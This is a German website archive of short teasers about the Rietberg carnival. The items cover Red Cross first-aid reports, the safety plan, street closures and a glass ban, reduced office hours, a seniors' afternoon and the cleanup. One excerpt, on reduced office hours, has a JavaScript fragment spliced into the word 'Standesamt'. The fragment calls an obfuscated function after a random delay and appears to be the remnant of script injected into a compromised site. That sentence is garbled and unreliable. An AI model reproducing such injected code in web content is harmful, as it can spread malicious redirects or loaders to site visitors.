Category Archives: Rietberg Karneval

Ein Hauch von Karneval in der Rathausstraße

Eigentlich würden sich die heimischen Närrinnen und Narren gerade intensiv auf die tollen Tage vorbereiten und dem Rietberger Karneval entgegenfiebern – eigentlich, denn das Corona-Virus macht auch hier alle Planungen zunichte. Um den Karneval aber nicht komplett ausfallen zu lassen und die Innenstadt ein wenig bunt und fröhlich zu gestalten, haben sich die Stadtmarketing Rietberg

Bilanz zum sanitätsdienstlichen Einsatz anlässlich des Straßenkarnevals – Teil 2

Resümierend können wir als DRK Ortsverein Rietberg nach den drei Straßenkarnevalstagen auf ein recht ruhiges und friedliches Einsatzgeschehen in Rietberg zurück blicken. Nachdem bereits im Vorfeld die sanitätsdienstliche Absicherung der diversen Sitzungen reibungslos vonstattenging, galt unsere Konzentration in den letzten Tagen nun dem Straßenkarneval als Höhepunkt des karnevalistischen Treibens. Bereits in unserer Pressemitteilung vom 13.

Zwischenbilanz zum sanitätsdienstlichen Einsatz anlässlich des Altweiberumzuges

Der erste große Tag des Straßenkarnevals in Rietberg ist vorüber und das DRK blickt auf ein durchaus ruhiges Einsatzgeschehen. Das bewährte Einsatzkonzept wurde wie geplant umgesetzt und die Zusammenarbeit mit der Jugendhilfe, den städtischen Ordnungsbehörden und der Polizei verlief gewohnt reibungslos. Am Altweiberdonnerstag wurden wir von DRK Kameraden aus Augustdorf, Bielefeld, Gütersloh, Halle, Herford, Herzebrock-Clarholz,

Sicherheitsplan für den Strassenkarneval steht

Die Vorbereitungen für den diesjährigen Straßenkarneval in Rietberg sind getroffen, das Deutsche Rote Kreuz sieht sich dank der langjährigen Weiterentwicklung des Einsatzplanes gut gewappnet. Wie auch in der Vergangenheit wird das Deutsche Rote Kreuz in diesem Jahr die medizinische Notfallabsicherung des Strassenkarnevals übernehmen. Auf Nachfrage beim planenden Ortsverein heißt es, dass man wie bereits seit

Heimische Prinzenpaare beim „Närrischen Landtag“

Da war richtig was los: Ein farbenfrohes und stimmungsvolles Bild haben knapp 150 Tollitäten beim „Närrischen Landtag“ am Dienstag in Düsseldorf abgegeben. Närrinnen und Narren aus allen Landesteilen waren in die Landeshauptstadt gekommen, um gemeinsam mit weiteren Prinzenpaaren den Karneval und die „Fünfte Jahreszeit“ zu feiern. Auf Einladung von André Kuper, Präsident des Landtags von Nordrhein-Westfalen, waren auch die

Eingeschränkte Öffnungszeiten über Karneval

Über die Karnevalstage ist die Rietberger Stadtverwaltung nur eingeschränkt erreichbar: Die Stadtbibliothek, das Archiv und das Museum bleiben am Weiberfastnachtsdonnerstag, 20. Februar, und an Rosenmontag, 24. Februar, Das Bürgerbüro und das Standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andesamt bleiben an Weiberfastnacht ab 11 Uhr geschlossen. Am Samstag, 22. Februar, und am Rosenmontag bleiben

Straßensperren und Glasverbot zu Karneval

Straßenkarneval in Rietberg – das bedeutet mehr als 15.000 Besucher an Altweiber (Donnerstag, 20. Februar) und Rosenmontag (24. Februar). Für alle, die nicht aus Rietberg kommen, stehen Busse zur Verfügung, die die Ortsteile und auch das benachbarte Kaunitz anfahren. Der Fahrplan ist einzusehen auf der Webseite der Stadt Rietberg (www.rietberg.de). Die Premiere vom vergangenen Jahr

DRK-Seniorennachmittag am 26.01.2020

Am Sonntag, dem 26.01.2020, findet für Senioren und Rollstuhlfahrer der traditionelle närrische DRK-Seniorennachmittag statt. Um 14.11 Uhr startet die bunte Karnevalsfeier mit dem Kaffeetrinken in der Aula des Rietberger Schulzentrums. Das närrische Programm gestalten dann ab 15.00 Uhr die Akteure der Grafschaftler Karnevalsgesellschaft zusammen mit Aktiven des DRK. Mit von der Partie ist auch das

Bilanz zum sanitätsdienstlichen Einsatz rund um Karneval

Resümierend können wir als DRK Ortsverein Rietberg nach den drei Straßenkarnevalstagen auf ein recht ruhiges und friedliches Einsatzgeschehen in Rietberg zurück blicken. Nachdem bereits im Vorfeld die sanitätsdienstliche Absicherung der diversen Sitzungen reibungslos vonstattenging, galt unsere Konzentration in den letzten Tagen nun dem Straßenkarneval als Höhepunkt des karnevalistischen Treibens. Bereits in unserer Pressemitteilung vom 25.

Bauhof hat alle Hände voll zu tun

Wo Tausende feiern, da bleiben anschließende Aufräumarbeiten nicht aus. Mit 15 Mitarbeitern war das Team des städtischen Bauhofes am Dienstag schon um 7 Uhr auf den Beinen, um die Innenstadt von den Überresten des Straßenkarnevals zu befreien. Plastikbecher und -fläschchen, Pappteller und Zigarettenschachteln, aber auch einige Reste von Luftschlangen und Kostümen wurden zusammengefegt. Bis Mittag